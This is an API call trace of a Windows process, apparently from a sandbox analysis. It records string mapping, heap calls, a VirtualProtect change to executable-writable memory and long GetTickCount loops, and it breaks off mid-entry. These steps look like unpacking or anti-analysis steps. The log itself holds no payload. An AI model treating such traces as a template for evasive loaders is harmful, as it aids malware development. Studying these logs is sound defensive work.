\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\篝ኒ∟) returned 256 [0141.029] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\篝ኒ∟, cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0141.029] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x22c) returned 0x291778 [0141.029] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\ﳝሔ䀌⤕∀, cchSrc=256, lpDestStr=0x2917a0, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ﷽﷽\\\식ራ∟) returned 256 [0141.029] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ﷽﷽\\\식ራ∟, cchWideChar=256, lpMultiByteStr=0x18fa34, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0141.029] HeapValidate (hHeap=0x290000, dwFlags=0x0, lpMem=0x291778) returned 1 [0141.029] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x291778 | out: hHeap=0x290000) returned 1 [0141.029] HeapValidate (hHeap=0x290000, dwFlags=0x0, lpMem=0x291540) returned 1 [0141.029] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x291540 | out: hHeap=0x290000) returned 1 [0141.029] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x824) returned 0x291540 [0141.030] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x42c660) returned 0x0 [0141.030] HeapValidate (hHeap=0x290000, dwFlags=0x0, lpMem=0x291240) returned 1 [0141.031] HeapValidate (hHeap=0x290000, dwFlags=0x0, lpMem=0x291240) returned 1 [0141.031] HeapValidate (hHeap=0x290000, dwFlags=0x0, lpMem=0x291240) returned 1 [0141.031] HeapValidate (hHeap=0x290000, dwFlags=0x0, lpMem=0x291240) returned 1 [0141.031] HeapValidate (hHeap=0x290000, dwFlags=0x0, lpMem=0x291240) returned 1 [0141.032] HeapValidate (hHeap=0x290000, dwFlags=0x0, lpMem=0x291240) returned 1 [0141.032] HeapValidate (hHeap=0x290000, dwFlags=0x0, lpMem=0x291240) returned 1 [0141.032] HeapValidate (hHeap=0x290000, dwFlags=0x0, lpMem=0x291240) returned 1 [0141.033] HeapValidate (hHeap=0x290000, dwFlags=0x0, lpMem=0x291240) returned 1 [0141.033] GetLastError () returned 0x0 [0141.033] GetLastError () returned 0x0 [0141.033] GetLastError () returned 0x0 [0141.033] GetLastError () returned 0x0 [0141.033] GetLastError () returned 0x0 [0141.033] GetLastError () returned 0x0 [0141.033] GetLastError () returned 0x0 [0141.033] GetLastError () returned 0x0 [0141.033] GetLastError () returned 0x0 [0141.033] GetLastError () returned 0x0 [0141.033] GetLastError () returned 0x0 [0141.033] GetLastError () returned 0x0 [0141.033] GetLastError () returned 0x0 [0141.033] GetLastError () returned 0x0 [0141.033] GetLastError () returned 0x0 [0141.033] GetLastError () returned 0x0 [0141.033] GetLastError () returned 0x0 [0141.033] GetLastError () returned 0x0 [0141.033] GetLastError () returned 0x0 [0141.033] GetLastError () returned 0x0 [0141.033] GetLastError () returned 0x0 [0141.033] GetLastError () returned 0x0 [0141.033] GetLastError () returned 0x0 [0141.033] GetLastError () returned 0x0 [0141.033] GetLastError () returned 0x0 [0141.033] GetLastError () returned 0x0 [0141.033] GetLastError () returned 0x0 [0141.033] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.034] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.035] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.036] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.037] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.038] GetLastError () returned 0x0 [0141.039] GetLastError () returned 0x0 [0141.039] GetLastError () returned 0x0 [0141.039] GetLastError () returned 0x0 [0141.039] GetLastError () returned 0x0 [0141.039] GetLastError () returned 0x0 [0141.039] GetLastError () returned 0x0 [0141.039] GetLastError () returned 0x0 [0141.039] GetLastError () returned 0x0 [0141.039] GetLastError () returned 0x0 [0141.039] GetLastError () returned 0x0 [0141.039] GetLastError () returned 0x0 [0141.039] GetLastError () returned 0x0 [0141.039] GetLastError () returned 0x0 [0141.039] GetLastError () returned 0x0 [0141.039] GetLastError () returned 0x0 [0141.039] GetLastError () returned 0x0 [0148.759] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0148.760] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualProtect") returned 0x769c4317 [0148.760] VirtualProtect (in: lpAddress=0x68f228, dwSize=0xf4b0, flNewProtect=0x40, lpflOldProtect=0x18dbd8 | out: lpflOldProtect=0x18dbd8*=0x4) returned 1 [0148.766] GetTickCount () returned 0x1d49c28 [0148.766] SetLastError (dwErrCode=0x0) [0148.766] GetTickCount () returned 0x1d49c28 [0148.766] SetLastError (dwErrCode=0x0) [0148.766] GetTickCount () returned 0x1d49c28 [0148.766] SetLastError (dwErrCode=0x0) [0148.766] GetTickCount () returned 0x1d49c28 [0148.766] SetLastError (dwErrCode=0x0) [0148.766] GetTickCount () returned 0x1d49c28 [0148.766] SetLastError (dwErrCode=0x0) [0148.766] GetTickCount () returned 0x1d49c28 [0148.766] SetLastError (dwErrCode=0x0) [0148.766] GetTickCount () returned 0x1d49c28 [0148.766] SetLastError (dwErrCode=0x0) [0148.766] GetTickCount () returned 0x1d49c28 [0148.766] SetLastError (dwErrCode=0x0) [0148.766] GetTickCount () returned 0x1d49c28 [0148.767] SetLastError (dwErrCode=0x0) [0148.767] GetTickCount () returned 0x1d49c28 [0148.767] SetLastError (dwErrCode=0x0) [0148.767] GetTickCount () returned 0x1d49c28 [0148.767] SetLastError (dwErrCode=0x0) [0148.767] GetTickCount () returned 0x1d49c28 [0148.767] SetLastError (dwErrCode=0x0) [0148.767] GetTickCount () returned 0x1d49c28 [0148.767] SetLastError (dwErrCode=0x0) [0148.767] GetTickCount () returned 0x1d49c28 [0148.767] SetLastError (dwErrCode=0x0) [0148.767] GetTickCount () returned 0x1d49c28 [0148.767] SetLastError (dwErrCode=0x0) [0148.767] GetTickCount () returned 0x1d49c28 [0148.767] SetLastError (dwErrCode=0x0) [0148.767] GetTickCount () returned 0x1d49c28 [0148.767] SetLastError (dwErrCode=0x0) [0148.767] GetTickCount () returned 0x1d49c28 [0148.767] SetLastError (dwErrCode=0x0) [0148.767] GetTickCount () returned 0x1d49c28 [0148.767] SetLastError (dwErrCode=0x0) [0148.767] GetTickCount () returned 0x1d49c28 [0148.767] SetLastError (dwErrCode=0x0) [0148.767] GetTickCount () returned 0x1d49c28 [0148.767] SetLastError (dwErrCode=0x0) [0148.767] GetTickCount () returned 0x1d49c28 [0148.767] SetLastError (dwErrCode=0x0) [0148.767] GetTickCount () returned 0x1d49c28 [0148.767] SetLastError (dwErrCode=0x0) [0148.767] GetTickCount () returned 0x1d49c28 [0148.767] SetLastError (dwErrCode=0x0) [0148.767] GetTickCount () returned 0x1d49c28 [0148.767] SetLastError (dwErrCode=0x0) [0148.767] GetTickCount () returned 0x1d49c28 [0148.767] SetLastError (dwErrCode=0x0) [0148.767] GetTickCount () returned 0x1d49c28 [0148.767] SetLastError (dwErrCode=0x0) [0148.767] GetTickCount () returned 0x1d49c28 [0148.767] SetLastError (dwErrCode=0x0) [0148.767] GetTickCount () returned 0x1d49c28 [0148.767] SetLastError (dwErrCode=0x0) [0148.767] GetTickCount () returned 0x1d49c28 [0148.768] SetLastError (dwErrCode=0x0) [0148.768] GetTickCount () returned 0x1d49c28 [0148.768] SetLastError (dwErrCode=0x0) [0148.768] GetTickCount () returned 0x1d49c28 [0148.768] SetLastError (dwErrCode=0x0) [0148.768] GetTickCount () returned 0x1d49c28 [0148.768] SetLastError (dwErrCode=0x0) [0148.768] GetTickCount () returned 0x1d49c28 [0148.768] SetLastError (dwErrCode=0x0) [0148.768] GetTickCount () returned 0x1d49c28 [0148.768] SetLastError (dwErrCode=0x0) [0148.768] GetTickCount () returned 0x1d49c28 [0148.768] SetLastError (dwErrCode=0x0) [0148.768] GetTickCount () returned 0x1d49c28 [0148.768] SetLastError (dwErrCode=0x0) [0148.768] GetTickCount () returned 0x1d49c28 [0148.768] SetLastError (dwErrCode=0x0) [0148.768] GetTickCount () returned 0x1d49c28 [0148.768] SetLastError (dwErrCode=0x0) [0148.768] GetTickCount () returned 0x1d49c28 [0148.768] SetLastError (dwErrCode=0x0) [0148.768] GetTickCount () returned 0x1d49c28 [0148.768] SetLastError (dwErrCode=0x0) [0148.768] GetTickCount () returned 0x1d49c28 [0148.768] SetLastError (dwErrCode=0x0) [0148.768] GetTickCount () returned 0x1d49c28 [0148.768] SetLastError (dwErrCode=0x0) [0148.768] GetTickCount () returned 0x1d49c28 [0148.768] SetLastError (dwErrCode=0x0) [0148.768] GetTickCount () returned 0x1d49c28 [0148.768] SetLastError (dwErrCode=0x0) [0148.768] GetTickCount () returned 0x1d49c28 [0148.768] SetLastError (dwErrCode=0x0) [0148.768] GetTickCount () returned 0x1d49c28 [0148.768] SetLastError (dwErrCode=0x0) [0148.768] GetTickCount () returned 0x1d49c28 [0148.768] SetLastError (dwErrCode=0x0) [0148.768] GetTickCount () returned 0x1d49c28 [0148.768] SetLastError (dwErrCode=0x0) [0148.768] GetTickCount () returned 0x1d49c28 [0148.768] SetLastError (dwErrCode=0x0) [0148.768] GetTickCount () returned 0x1d49c28 [0148.769] SetLastError (dwErrCode=0x0) [0148.769] GetTickCount () returned 0x1d49c28 [0148.769] SetLastError (dwErrCode=0x0) [0148.769] GetTickCount () returned 0x1d49c28 [0148.769] SetLastError (dwErrCode=0x0) [0148.769] GetTickCount () returned 0x1d49c28 [0148.769] SetLastError (dwErrCode=0x0) [0148.769] GetTickCount () returned 0x1d49c28 [0148.769] SetLastError (dwErrCode=0x0) [0148.769] GetTickCount () returned 0x1d49c28 [0148.769] SetLastError (dwErrCode=0x0) [0148.769] GetTickCount () returned 0x1d49c28 [0148.769] SetLastError (dwErrCode=0x0) [0148.769] GetTickCount () returned 0x1d49c28 [0148.769] SetLastError (dwErrCode=0x0) [0148.769] GetTickCount () returned 0x1d49c28 [0148.769] SetLastError (dwErrCode=0x0) [0148.769] GetTickCount () returned 0x1d49c28 [0148.769] SetLastError (dwErrCode=0x0) [0148.769] GetTickCount () returned 0x1d49c28 [0148.769] SetLastError (dwErrCode=0x0) [0148.769] GetTickCount () returned 0x1d49c28 [0148.769] SetLastError (dwErrCode=0x0) [0148.769] GetTickCount () returned 0x1d49c28 [0148.769] SetLastError (dwErrCode=0x0) [0148.769] GetTickCount () returned 0x1d49c28 [0148.769] SetLastError (dwErrCode=0x0) [0148.769] GetTickCount () returned 0x1d49c28 [0148.769] SetLastError (dwErrCode=0x0) [0148.769] GetTickCount () returned 0x1d49c28 [0148.769] SetLastError (dwErrCode=0x0) [0148.769] GetTickCount () returned 0x1d49c28 [0148.769] SetLastError (dwErrCode=0x0) [0148.770] GetTickCount () returned 0x1d49c28 [0148.770] SetLastError (dwErrCode=0x0) [0148.770] GetTickCount () returned 0x1d49c28 [0148.770] SetLastError (dwErrCode=0x0) [0148.770] GetTickCount () returned 0x1d49c28 [0148.770] SetLastError (dwErrCode=0x0) [0148.770] GetTickCount () returned 0x1d49c28 [0148.770] SetLastError (dwErrCode=0x0) [0148.770] GetTickCount () returned 0x1d49c28 [0148.770] SetLastError (dwErrCode=0x0) [0148.770] GetTickCount () returned 0x1d49c28 [0148.770] SetLastError (dwErrCode=0x0) [0148.770] GetTickCount () returned 0x1d49c28 [0148.770] SetLastError (dwErrCode=0x0) [0148.770] GetTickCount () returned 0x1d49c28 [0148.770] SetLastError (dwErrCode=0x0) [0148.770] GetTickCount () returned 0x1d49c28 [0148.770] SetLastError (dwErrCode=0x0) [0148.770] GetTickCount () returned 0x1d49c28 [0148.770] SetLastError (dwErrCode=0x0) [0148.770] GetTickCount () returned 0x1d49c28 [0148.891] SetLastError (dwErrCode=0x0) [0148.891] GetTickCount () returned 0x1d49ca5 [0148.891] SetLastError (dwErrCode=0x0) [0148.891] GetTickCount () returned 0x1d49ca5 [0148.891] SetLastError (dwErrCode=0x0) [0148.891] GetTickCount () returned 0x1d49ca5 [0148.891] SetLastError (dwErrCode=0x0) [0148.891] GetTickCount () returned 0x1d49ca5 [0148.891] SetLastError (dwErrCode=0x0) [0148.891] GetTickCount () returned 0x1d49ca5 [0148.891] SetLastError (dwErrCode=0x0) [0148.891] GetTickCount () returned 0x1d49ca5 [0148.891] SetLastError (dwErrCode=0x0) [0148.891] GetTickCount () returned 0x1d49ca5 [0148.891] SetLastError (dwErrCode=0x0) [0148.891] GetTickCount () returned 0x1d49ca5 [0148.891] SetLastError (dwErrCode=0x0) [0148.891] GetTickCount () returned 0x1d49ca5 [0148.891] SetLastError (dwErrCode=0x0) [0148.891] GetTickCount () returned 0x1d49ca5 [0148.891] SetLastError (dwErrCode=0x0) [0148.891] GetTickCount () returned 0x1d49ca5 [0148.891] SetLastError (dwErrCode=0x0) [0148.891] GetTickCount () returned 0x1d49ca5 [0148.892] SetLastError (dwErrCode=0x0) [0148.892] GetTickCount () returned 0x1d49ca5 [0148.892] SetLastError (dwErrCode=0x0) [0148.892] GetTickCount () returned 0x1d49ca5 [0148.892] SetLastError (dwErrCode=0x0) [0148.892] GetTickCount () returned 0x1d49ca5 [0148.892] SetLastError (dwErrCode=0x0) [0148.892] GetTickCount () returned 0x1d49ca5 [0148.892] SetLastError (dwErrCode=0x0) [0148.892] GetTickCount () returned 0x1d49ca5 [0148.892] SetLastError (dwErrCode=0x0) [0148.892] GetTickCount () returned 0x1d49ca5 [0148.892] SetLastError (dwErrCode=0x0) [0148.892] GetTickCount () returned 0x1d49ca5 [0148.892] SetLastError (dwErrCode=0x0) [0148.892] GetTickCount () returned 0x1d49ca5 [0148.892] SetLastError (dwErrCode=0x0) [0148.892] GetTickCount () returned 0x1d49ca5 [0148.892] SetLastError (dwErrCode=0x0) [0148.892] GetTickCount () returned 0x1d49ca5 [0148.892] SetLastError (dwErrCode=0x0) [0148.892] GetTickCount () returned 0x1d49ca5 [0148.892] SetLastError (dwErrCode=0x0) [0148.892] GetTickCount () returned 0x1d49ca5 [0148.892] SetLastError (dwErrCode=0x0) [0148.892] GetTickCount () returned 0x1d49ca5 [0148.892] SetLastError (dwErrCode=0x0) [0148.892] GetTickCount () returned 0x1d49ca5 [0148.892] SetLastError (dwErrCode=0x0) [0148.892] GetTickCount () returned 0x1d49ca5 [0148.892] SetLastError (dwErrCode=0x0) [0148.892] GetTickCount () returned 0x1d49ca5 [0148.892] SetLastError (dwErrCode=0x0) [0148.892] GetTickCount () returned 0x1d49ca5 [0148.892] SetLastError (dwErrCode=0x0) [0148.892] GetTickCount () returned 0x1d49ca5 [0148.892] SetLastError (dwErrCode=0x0) [0148.892] GetTickCount () returned 0x1d49ca5 [0148.892] SetLastError (dwErrCode=0x0) [0148.893] GetTickCount () returned 0x1d49ca5 [0148.893] SetLastError 